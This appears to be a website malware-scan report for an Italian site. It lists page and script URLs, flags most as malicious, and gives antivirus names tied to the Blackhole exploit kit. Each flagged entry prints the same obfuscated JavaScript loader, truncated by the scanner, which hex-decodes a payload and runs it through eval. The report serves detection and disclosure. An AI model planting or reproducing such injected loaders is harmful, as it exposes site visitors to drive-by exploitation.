Request | Server response | Status |
http://piquadroenergia.it/ | 200 OK Content-Length: 15754 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). The sample is truncated by the scanner; the visible loader splits the hex string on "(", subtracts 69 from each hex value, rebuilds the text with String.fromCharCode and passes the result to eval:
rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...
b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/Cartoceto.html | 200 OK Content-Length: 10965 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...
b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/js/jquery.js | 200 OK Content-Length: 67661 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...
b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/js/interface.js | 200 OK Content-Length: 92710 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...
b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/js/coin-slider.min.js | 200 OK Content-Length: 21752 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...
b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/js/coin-slider.js | 200 OK Content-Length: 24285 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...
b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.piquadrosrl.com/script/aggiornamento.js | 200 OK Content-Length: 19 Content-Type: application/javascript | clean |
http://piquadroenergia.it/index.html | 200 OK Content-Length: 15754 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...
b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/Camminate.html | 200 OK Content-Length: 11800 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...
b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://piquadroenergia.it/test404page.js | 404 Not Found Content-Length: 910 Content-Type: text/html | clean |
http://piquadroenergia.it/Cagli.html | 200 OK Content-Length: 11429 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
rnvj="y";ibko="document";try{+function(){if(document.querySelector)--(window[ibko].getElementById("asd"))}()}catch(mlqert){lsjj=function(wqurq){wqurq="fro"+wqurq;for(tac=0;tac<rnvj.length;tac++){olqmw+=String[wqurq](lpmlew(yik+(rnvj[tac]))-(69));}};};lpmlew=(window.eval);yik="0x";xijca=0;if(!xijca){try{++lpmlew(ibko)["\x62o"+"d"+rnvj]}catch(mlqert){wglhl="(";}rnvj="65(ab(ba(b3(a8(b9(ae(b4(b3(65(a7(ba(be(ae(b9(75(7e(6d(6e(65(c0(52(4f(65(bb(a6(b7(65(b8(b9(a6(b9(ae(a8(82(6c(a6(af(a6(bd(6c(80(52(
... 3726 bytes are skipped ...
b3(71(65(aa(b3(a9(65(6e(65(6e(80(52(4f(c2(52(4f(ae(ab(65(6d(b3(a6(bb(ae(ac(a6(b9(b4(b7(73(a8(b4(b4(b0(ae(aa(8a(b3(a6(a7(b1(aa(a9(6e(52(4f(c0(52(4f(ae(ab(6d(8c(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(6e(82(82(7a(7a(6e(c0(c2(aa(b1(b8(aa(c0(98(aa(b9(88(b4(b4(b0(ae(aa(6d(6c(bb(ae(b8(ae(b9(aa(a9(a4(ba(b6(6c(71(65(6c(7a(7a(6c(71(65(6c(76(6c(71(65(6c(74(6c(6e(80(52(4f(52(4f(a7(ba(be(ae(b9(75(7e(6d(6e(80(52(4f(c2(52(4f(c2".split(wglhl);olqmw="";lsjj("mCharCode");lpmlew(""+olqmw);}
Antivirus reports:
- AntiVir
- JS/Blacole.EB.226
- Avast
- JS:Decode-BKU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.XD
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|